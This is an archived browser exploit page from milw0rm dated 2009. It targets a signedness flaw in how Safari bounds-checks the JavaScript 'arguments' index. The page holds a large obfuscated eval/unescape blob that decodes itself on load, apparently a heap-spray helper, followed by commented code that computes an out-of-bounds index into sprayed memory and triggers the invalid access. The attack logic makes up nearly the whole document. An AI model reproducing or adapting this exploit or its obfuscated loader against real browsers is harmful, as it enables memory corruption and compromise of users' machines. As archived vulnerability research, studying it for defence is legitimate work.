137 lines
No EOL
34 KiB
HTML
137 lines
No EOL
34 KiB
HTML
<BODY>
|
||
<CODE id="sploit status"></CODE>
|
||
<CODE id="heapspray status"></CODE>
|
||
<SCRIPT>
|
||
|
||
i=0;eval(unescape(("gÂ#MÂÂÂ#Âg#ÉÄÊÅ@ÅÑÅÅÅØÅÉÅÊÆ@gÑÜ@ÜÑÜÂÜ#ÜÄÜÅÜÆÜgÜØÜÉÜÊÜËÜÜÜMÃœNÜßM@MÑMÂM#MÄMÃ…MÆMgMØMÉMÊMËMÃœMMMNMßN@NÑNÂN#NÄNÃ…NÆNgNØNÉNÊNËNÃœNMNNNßß@ßÑßÂß#ßÄßÅßÆßgßØßÉßÊßËßÜßMßNßßÂÂ#ËÆÄ#MÂÂMÂgÄgÉg@ÆÅÆßÆÆÂØNgÂÉ#MßÄNg#MNØ#ËNØ#MÆÆÕÅÂ@M#ÅßßßgÄÂÜÆÅN#MÂÂÑÆÕÂÉÆÅ#MãÑ#ËMÂÂÑgÄÂÉgÄ#M#Ã#Ã#\
|
||
Ëg #\
|
||
#M NgÂNÆ#ÆQÆ Ü\
|
||
ÆÜ ÂØgÄßÅÂÜgÄÂÉ#ËMÂg#N @\
|
||
#Ü ÆÅÂÉg##MÆNÆÕggÂ@ÄÑgÂgÂÆÑgÉ Â\
|
||
ØÆ ÅÂMg#N@ÂË#ÑÂÉÂNÆÊÆßMÊÂØÅÜÂÂ#@Ü Æ\
|
||
ÂË g##ËNMgÄgÅgÂÆ NÂ@g##ËgM#ËÆgÆÜ Å@#MgËÅÜÂÂ ÄMÅ#Ä É\
|
||
ÄÅ Â@#gÄ@ÄNÅÄÂ@#ÅÂN#ÑßÆNÑ#Ãß g#ÑÜ#Ãœ#gMMÅÄ MÃ…#ÄÉÄÅ Â@#gÄ@ÄNÃ… Ä\
|
||
Â@ #ÆÂN#ÃßÆNÑ#Æßg##Ãœ#Ãœ#gMNN#ÅÂN#ÑÄÊ NN#ÆÂN#ÃÄÊg M#ËÆÆÅ ÅÂà ßØ#ÂÂØgÄÂÜÆÅ Â\
|
||
Üg #N#MÆãMgÄ#ßgÄ#ÊNÑÄÄ#@ÄÄ#@ÄÄ#@ÄÄÜËÆÑßÉ g##Mg##ßg## ÊgËgMÜ ËßÊ#MÆ ÅãßÆÅ#ÊÅÜÂÂÅÜÅÜ #\
|
||
@Ã… ÜÂÂÜËÜg#MNÑ#ÆÜ#Ãœ#ÜËÅØ#MNÑ#ÃÃœ#Ãœ##ËÅÊ#MNÑã@ #ÑÜ##Ã#ÃÜË Mg#MÆ ÆæÑÆÜg#ÆÅÜ ËÆÉÅÉÜÂ#M# ÃgØ#Â#à Ü\
|
||
ËÆ ÉÅÑÜÂ#M#ÄÜËÆÉÅÑNßÅ#ÆÉgÊÆÅ#MãÂÜËMÑ#MÆNgÅÆÜÆÜÜ Ëg#ÄÜÆßÆg#M ÅÜÂÂÅ ÜÂÂÜËg#Å#MØ #MÅÜÂÂÅ Ü\
|
||
 ÜËMÃœ#MÆNgÅÆÜÆÜ#ËÆÉÜÜ ÂØÄ#ÆØgÂÆßÆMÆÅMÃgÜßË ÂØÄÆÆÉNMÆÆÆ ßgØM@ gÜßËÂØ Ä\
|
||
MÃ… #ÄÉÄÅÂ@ÅÜÅÜÆÄÂË ÉßËgÜßËÅÆÜÊg#ÆÉÆ ßÆNÂØM@ÂØÅ#Æ ÃÆÆæ ÑgÂÆÉ Â\
|
||
Éß ËgÜßËÂØÄßg@ÜÊÆ ÑMÃgÜßËÂßMÅÂÄ#Ñ ÂÄ#ÂÂÄ#ãÂÄ#ÅÂÄ# ÄÂÄ#Æ ÜÆ#Ëg Â\
|
||
ÜÜ ÅÜÅÜÂØßËÅgMÊÆ ÄÆßggg#Â@ÂØÅËÅ N#ËÅMÂÊÂÉßËÂßMÅÂÄ#ÑÜÆ #ËÆN# MÆÉÜN Ä\
|
||
@ß @gÂ#ËÅ@#MÆgÆ ÜÅ@ÅËÆNÅM#ËMÂÅ @ÂÉÆÆÆßgÂÂØg#NÄ @MÊ @Å@ÂÉg ÄßÅÅ Ë\
|
||
g# NÄÅM#MÅ@ÅËg#N ÄÅMgÑMËÆßÂÜÆÑN#M MãMÆNÆÅggÂ@Ä ÆÅÅ ØÅÜÂÂÜM NÆÆÄ Æ\
|
||
ÅÅ ÂNÆãÆÑÆÜÆÜÂØ ÜMÂNÆßÅÄßÅÂÉÜÆ#ËMMÂNÆßÅ ÄßÅ#MgÄßÅ #ËMM NÆÆÄÆÅÅã MÆß# Ë\
|
||
g# ÆÅgÄÅÄÆÉÆMÆÅ ÆßgÅgÄÂØMMÂÜÆÑMNN ÉÆÜÆßÆ gMËÆ ßN#Â#g #ÄÜ Æ\
|
||
ßÆ gÂË#MÂ#g#Å#M ØNÉg#MØÂØÆßM NNÉg #MØM ËÆßN# Â#g# Å\
|
||
#M Ø#MÆßMßÅÜÅÜg ÄÂßÆgMÅNÅ N ÅNÅN ÅÜÆMß#ÜÂßÆgMÅ ÂÆÆÜ g\
|
||
Ä# ËÜÆÜN#ÜÄÂÅÂ# NÅÜÂÂ#Ë MÂÂ #MÑÂ ÉÂ# MÑ ÂNMÊÆNÜÊÄØÅÄÄMÄÜ#MÂ #g# Ä\
|
||
ÜÆ ßÆgÂËÂ#g#Å#M Ø#ËgM NÉg#gÄ gÂMÊ ÆgÄÆÆÉ ÆÜÆÜMËÆßÂÜÆÑN #ÆÈ#MNÂÆ ãÆÅ Æ\
|
||
ÉÆ ÜÂØÆÑÂßÆßN@ É#ËÆ Ä#MÅÜÂÂÅÜ Â Â#ËÆ Ü#MNÂÆ#ÆÕ ÆÉÆÜÂØNÂÆÜÆß ÆgÂØÆØ ÂË#ÑÂÉ ÂßN Æ\
|
||
ÜÆ ßÆgÂØ#ÂÂÉÂÉ# ËÆ ÆÆßgÂÂØÆg#M ÆÜ#ËÆ g#N# M#Ã#ËÆgÂMÂM N#ÆÄÂË#M ÆÄ#ËM ÆØÂÆNÂg@ÆßggÂØ #ÂÂÜ Æ\
|
||
g ÉÂÉÆÄÂË#MÆß# ËgMNMgÄgÅgÂÆN @ÆÄÜØ#@ ÂÜÆÑ MNÜËg#Ü ÄMËÆßN# Â#MÜ# MÆß#ËÜ ÑÅ#ÜÄMÊÆ gÂ@Æ Æ\
|
||
g ÆßÆMÂ@ÜÅÂ#Üg #ÉÜNÂ@gÄÆßÂ@ÜÅM Æ#ÉÜNÂNÜÆ #ËÜÑ ÅÜÅÜgÄ ÄÑg#g# gÅÆMM ÊÆg @ÆÑÆÄÆÄ NMg #\
|
||
g# Â@gÆÆÃgÂÆÉß ÜÆÉÆßÆNg#Â@Æß ÆÆÂà gÃ…g@Â@gÄÆ ßÂ@Ãœ ÅÂ#ÅØ# ÉßÑÂ@Æ ãÆÑgÃ… g#Æ ÅÆÄÂÃÆ gÉ @\
|
||
ÆÆ gÂÆÑÆgÆMÆ ÅÆNgÄßÜÆÉÆßÆ NßÂg@N Mg@ÆÑNMß ØÂÜ# ÑMNNÉ g@NMg@ ÆÑNM ßØMË N#Æß#M Â#Å ß\
|
||
Åß g#gÄgÂMÊ ÆgÄÆÆÉÆÜÆÜ ØÂ#ßÊÂÜ MÉ É#ËÆÆÆßg ÂÂØÆ ÑÂÃMÊ @Â#ÆQß Ég#N #ÆØ #MÆ NÆÕgg @M#ÂØÆ ÑÂÉ #\
|
||
ËM ÂÆØÂÅ#Â# MãM#ÑÂÉgÄÆØ gÂÆßgg Â@ÆNÆ Ã…ggÂ@ÄÅ gÂg Æßg ØÅÜ ÄßÆÆ Ææg#Æ Ã…gÄ g#Â@Æß ÆÆÂÃÆãÆ@g#Â@ÆM g\
|
||
Ã…g #gÄÂ@ÆÂÆ ÅÂÃÆÅgÆÆÅ ÆNÂÃÂØ ÆÆÆßgÅÆ NÆÄÂ@ß @ÆØ# ÉÂËÜÆ ÜÆ#ËÆÆ æßg ÂØÆÄÂ@ MÊÂ@g# ÅËÆÑÅMN #ßÉ#Mg# Ã…\
|
||
ËÆ ÑÅMÅËÆÄ Ã…M#ËÜÑÅÜÅ ÃœgÄÄÉ ÆNg#ÜÊgÄ ÆÅÆÄß Mg#ÜÄ Â@Æ# ÆÃÂ@ß ÜÂ@Æ ßÆÆÆæg#ÆÅgÄ @ÜÅÆØÂNß ß#Ñã ÆÂÜ#Ä É\
|
||
ÜN #ÊÂ@ß@ ÆÄÜNÂNÜÆ# ËÆß#M ÆßÜØ#@ÂÜ ØÆØ#N #N#Ñ ÉÂÉÂË ßÉÂËÆ ßÜØ ØÆØ #N#N#ÑÂÉÂËßÉN@ÂÉ #ËM ÆßN@ #NM É\
|
||
N# ÆÉÄÅgØ Æ#ÆÕg#g# #MÆßN @ÂMMÉ#ËÆß #MÆßÜ ØMÉ ÉÂËÆ ßÜØÆÉ ÄÅg ØÆ#Æ Õg#g#ÂÜ MÉM NgMg M\
|
||
NÆ #ÆãÄÄË @ÆÂß#ÆËß@ÂØÂ#Æà ßÉg##ßÅÜ ÂÂ@g gÆÉg ÄÆØ @MÊg# ÜÊg ÄÆÅ ÆÄ Â@Æã Æ@g# M\
|
||
ÄÅ ÜÂÂÜÆÜN NÜÆÜËg#ÜÉ#MÆßÜ ËÆÑg#ÅÉ#M ÅËÅM ÜËÆÉÜ Ég# #Mã@ ÜËÜ ß#M# ÃÜË ÆÉ g#M #\
|
||
Üg gÑ ÂØÂ#ÅßÅßÆ #NMßÜÆÅßØÅÑÂÜ#Ñ MNNÉÆ#NMß ÜÆÅß ØÅÑMË N# M Â#g #ÜÉN @#ÜÅ ÊÂß #ÂN# #\
|
||
g# ÜÉÂË#M Â#g#ÜÉgÑ ØÜMÂÜ#ÑMNÆÅÆÜg#ÆÅ gËNÆÜÅÅÊ #Éß ÑÂ@Æ Âß# ÆËÂ@Æ Ææßg ßMg #ÜÄMÊ Æ\
|
||
gß Âg#ÜÄÅÉÂÜ# ÑMNgMNÉg#Ü ÄÅÉMËN #MÂÂ#Mg #ßßNÂg#N#MMÆ ÂMÂãÅ Ø#Ê ßNÂg#Ü#M MÆÂËÂ#ÅØ N#N Ê#MÂØ ß\
|
||
NÅ ÉÜÂÂËßNÅÑÜÂÂÉÂß #Â#ËÆÉNßÄÜ Ü@#MÂØß NÅÑNßÅ #ÆÉgÊÆÅ ÂÉÂß# Â#Ëg# Âg# MÂ#Mg#ßNËÂMÂ#ÅØ É#É# ÊNËÂË #\
|
||
ÅØ ÂÉ#ÉÜËÆÑg#ÅÉÅËg#ÂgÅM #Mg#ÂgÂËÂ# g#ÜÉÜØ NÊÂËg# ÂgN@ ÂÜÅÊ ß#ÂÂMÂØNÊÂËÆÉNßÄÜÜ@ÂÉÂMg#Âg N@ ÉÜËÆÉÜÉg#ÂËÂËÜ ËÜß Ë#MÅÊ Ü\
|
||
ËÆ ÉÂgÂË#MÂ#Mg#ßÂM ÅÊ#ÊÅÊNÉg# MØÂØÅÜ ÂÂÅÜÅÜg ÄÄÑ ÆÜß#ß ÜÆÅÆÄÂ@ß@ßNÜÉg#ÜNßMÆÂß#ÆËg#Â@ÂØß@Â#ÜßÂNßß ÉßÑ ÂÉÂ@gÄÆßÂ@g #ÜÄ @gNÜÅ #\
|
||
Ãœg #ÉÜNÂMÜÅÂØßN gÂËÂ#ÅØÂÉ#É ÃœNßÂg #ÜÄÅÉÂÜ# ÑMN ÆÅÆÜg#ÆÅgËÜÑÄ#ÆßÆÜÆÜÆÅ ÆãgÄMÊÆgÂ@ÆgÆ Ñg ÆÂÆÃÆgÆÅ Ãœ Æ#ËM gÄgÉg@ Æ\
|
||
ÅÆ ßÆÆÂØNÜÂÉÂÑß ÄNÜÂØÂÉ#ËM ggMÊÆ ÄÆßggÂNÆ gÆ# ÂÉggMÊÆÄÆßggÂNÆg Æ#ÂØÂÉ#ËÜ ÑÅÉÂ@g#ÜÄ @ÆÄ Æ ßÆNÆÅ NÜÆÜËMÜ Â\
|
||
ØÆ ßßØMN#ËgMgM #gÄßÅÂNÂgÄÑ ÆÄÆÄN Mg#g##ÉÂN ßß# ÑãÆÂÜ#ØÂÉÄÊß Æ#ÃgØ#gÄÆßg#ÑÜ#Ãœ #MÃ…MgMÄ gÄ gÂgÅÆÅM ÅÆÉÅÉÜ M\
|
||
Ä# @MÅÆÉÅÑÜÂMÄ# @gMÃ…@ÆÜÅ#gÉg #gÄÆ ÅÆMÅãg@ÆÅÆ ãÆÉ ÆÆÆÉÆãNÄg #ÅÑÅãgÄgÂMÊÆgÃ…Ã…gÅÆNÆ #gÄ ÆÉÆßÆNÃ… ØÆÉ ÅÆÆÃgÂÆÉÆÑÆ NÆãÆÅÅÉÄ Ø\
|
||
ÆÅ ÆÃg@ÅÊßNÄÂß# ÆËÅ#ÆÉgÊÆÅÆ ÃÆßÆM g@ÆßÆNÆÅÆN gÄgÑ ÜËg#ÆÅ gÄÅÄÆÉÆMÆÅÆßgÃ…gÄÜ@ÆÅÆNÆ ggÄ ÆØÜÑÂ#Åß ÅßÆÜÆ ßÆgÂØÅÜÂÂÜÂÄØÆÅÆÃÆÄÜÊ Ã…\
|
||
#Æ ÉgÊÆÅÜ##Ã#Ã# ÃÜÄg@gÂÆÑgÉ ÜÅ#@ gØß@ÜÆÅÜÂÂÂÉ ÃœgÆÉ Ã…#g ÄÆÑg gÄÂgÜØÂNg#gÅÆ Âg#g ÄgÂÂØÜÉÅÉÄ Âß#ÆËÜÊÆ Ã…gÂÜË#ËÂ#ÜÜ#MÆNÆÃgÆ Æ\
|
||
ÉÆ gßÜÆßgÂÂNgÅg# ÜÊÄÑÆgÆÅÆNgÄ MßßË ÜMÆÑgÂÆggÅÆMÆÅÆNg Äg# NÆ#ÆQ ÆÜÆÜÆÅÆÅÜNÂË ÅÜ ÜßÆÉÄÂgÉgÄÆÅg#ÄÑÆÜß#ßÜÆ ÅÆÄM@ÅÜÅÜÂßÅÜÅÜ Æ\
|
||
Ä ËÂÉßËMÑÆßÄßgÅgÄ g@gÅgÄÄÅÆÜÆÅ ÆMÆÕ ÆNgÄMÂÆÉÆÆÂØ M#ÄN gÅÆMÆ ÂÜÊMÄÅÜÂÂ#ÊMÅ ÂÜÅÜÂÂM ÆßNÅÄÆÑgÂÆgÆÅgÄÂgMg ÆÂÅÂÆÅgÆ Ü\
|
||
Êg #ÆÅMØgÄßÜgÃ…g#MÉ#@gØ# ÑÜ##ÃÂß#ÂMÊÆÉÆNMË #MÆÆ ÕÅÂØMÜÆ ÆÄÄÆß ÆNÆ ÅÄØÆÑÆNÆÄÆÜÜÊMMÆÆÅggÂÆ Ñg@g@ÜÊMNÂÉ#ËgM M\
|
||
ß NNMg@ÆÜÆÑÆãÆÅÂØÂßN@ÂNÆÜÜ@NÑ#ÃgØ#@NÂÄMß ÜÆØ ÂN N#ÂÉ gËNÄÅ#ÆÅgÄgÄMÊÆgNÅ ÆÆNÆÂg#g@#Ë N\
|
||
ÆÜ ÑÅÜÅÜgÄÄ#NMßÜÆÅÆÄÂ@ÆßÆNÆÅ Â@Ng M#Åß ÆßÆÜÆÄÅÄÆßÅÑNØ M#ÂNg@gÂÆ ß\
|
||
gÄ ÆßgÄgÉg@ÆÅÂN gÄÆ ßÅÑNÉ ÜËÅßÅßN ÊÆÉÄØ Æ\
|
||
ÅÆ ÃÆÄÜÊ ÄÜÜ @\
|
||
NË ÅÜÂÂÜ Å ß\
|
||
NÂ g#ÉÜNg N\
|
||
ÜÅ ÂØßNÂg N\
|
||
ÜÄ #ÆßÆÜÆ Ü\
|
||
ÆÅ ÆãgÄÄgÆ Ñ\
|
||
g ÆÂÆÃÆgÆÅ N\
|
||
Mg ÂÆÅNNMÅÅ# Æ\
|
||
ÃÆ ÆæÑgÂÆÉÂß## Ä\
|
||
@Ä NÅÄÂ@NßÄÆÆß ÆßgÄÜÊß@ÅÜ Â\
|
||
Ëß ÑÜNÂ@ÆÂgÉgÄÆÅg#ßÂÂNÜÆg ÑÂØÂ#ÅßÅßß#ÆÜÆßÆ #\
|
||
ßÄ #MÅÜÂÂgÅÆ NÆÄÆÅÆÆmÊÆÅÆÄÜÆßÅÆØÆÉg#ßÆMÄgËÅÜÂÂÜgMÄßg Ü\
|
||
#Ãœ #MÃ…Ã… ØMÄNÑßØÅÉÅ#ÜÄßÉg#Ä#ÆÃßÊg#ÄÂÆÑÆã Æ\
|
||
ËÆ gg ÂÆßgÅÆNÆÄßËÂNÂÊßÜÆÑgÄßM Â\
|
||
@Æ Ø ÆÅÆÃg@Â@ßNÂ#ÆÉß ß\
|
||
gÄ Æ\
|
||
ßÅÑÂØÂÂ#ËÆÆÆßgÂÂØÆ#ãM#g#ÆãËÆ#ÂMÂMãËÆÄ#MÂØgÄ#MÆÄÂNg#g@ÆÜÆÉgÄÂØgÂÂNÆ#ÆÈÆÃgÂÄÑgÄÂØÆ#ÂÉÂÉÂÉÂNÆÊÆßÆÉÆNÂØgÄÂNg@Æßg@ÂØÂÉÂÉÂÉ#ËÆÅgÆÆÃÆÜÂØÆÄÂÉ#ËÂßÂßÂMÆ#ÂÄ#Ë#ãÅÊ#Ñ").replace(/./g,function(c){return" `'^*\\/|-_.swdibYPW,".indexOf(c)<0?(i++%2?'':'%')+(c.charCodeAt()&15).toString(16):''})))
|
||
|
||
// The index for the "arguments" array in a JavaScript function in
|
||
// Safari suffers from a signedness issue that allows access to elements
|
||
// that are out of bounds. The index is cast to a signed value before it
|
||
// is compared to the length of the array to check if it within the
|
||
// bounds. Integer values larger than 0x8000,0000 will be cast to a
|
||
// negative value and because they are always smaller then the length,
|
||
// they are treated as a valid index.
|
||
// The index into the arguments array ends up in instructions
|
||
// that multiply it by 4 to access data in an array of 32 bit values.
|
||
// There are no checks for overflows in this calculation. This allows us
|
||
// to cause it to access anything in memory:
|
||
// Pointer to object = base address + 4 * index
|
||
// The base address varies only slightly and is normally about
|
||
// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
|
||
// predictable location using heap spraying, we can then calculate an
|
||
// index that will access this memory.
|
||
var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
|
||
var iTargetArea = 0x10000000;
|
||
// Be advised that heap spraying is "upside down" in Safari: strings
|
||
// are allocated at high addresses first and as the heap grows, the
|
||
// addresses go down. The heap will therefor grow in between a lot of
|
||
// DLLs which reside in this area of the address space as well.
|
||
// We'll need to find an area of memory to spray that is not likely to
|
||
// contain a DLL and easy to reach.
|
||
var iTargetAddress = 0x55555555;
|
||
// iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
|
||
// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
|
||
var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0)
|
||
// iIndex = (iTargetAddress - iBase) / 4
|
||
var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
|
||
// We need to trigger the signedness issue so the index must be larger
|
||
// then 0x8000,0000. Because of the integer overflow in the
|
||
// multiplication, we can safely add 0x4000,0000 as often as we want;
|
||
// the multiplication will remove it from the result.
|
||
while (iIndex < 0x80000000) iIndex += 0x40000000
|
||
document.getElementById("sploit status").innerHTML = (
|
||
"iBase + 4 * iIndex = " +
|
||
"0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
|
||
"0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
|
||
);
|
||
// Set up heap spray
|
||
var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
|
||
oHeapSpray.oOutputElement = document.getElementById("heapspray status")
|
||
// Spray heap asynchronously and call sploit when done.
|
||
oHeapSpray.spray(sploit)
|
||
function sploit(oHeapSpray) {
|
||
// This will cause an access violation using the value 0xDEADBEEF,
|
||
// which comes from the strings we sprayed the heap with.
|
||
// 6aa3d57f 8b4f0c mov ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
|
||
arguments[iIndex];
|
||
}
|
||
function DWORD(iValue) {
|
||
return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
|
||
}
|
||
</SCRIPT>
|
||
</BODY>
|
||
|
||
# milw0rm.com [2009-01-05] |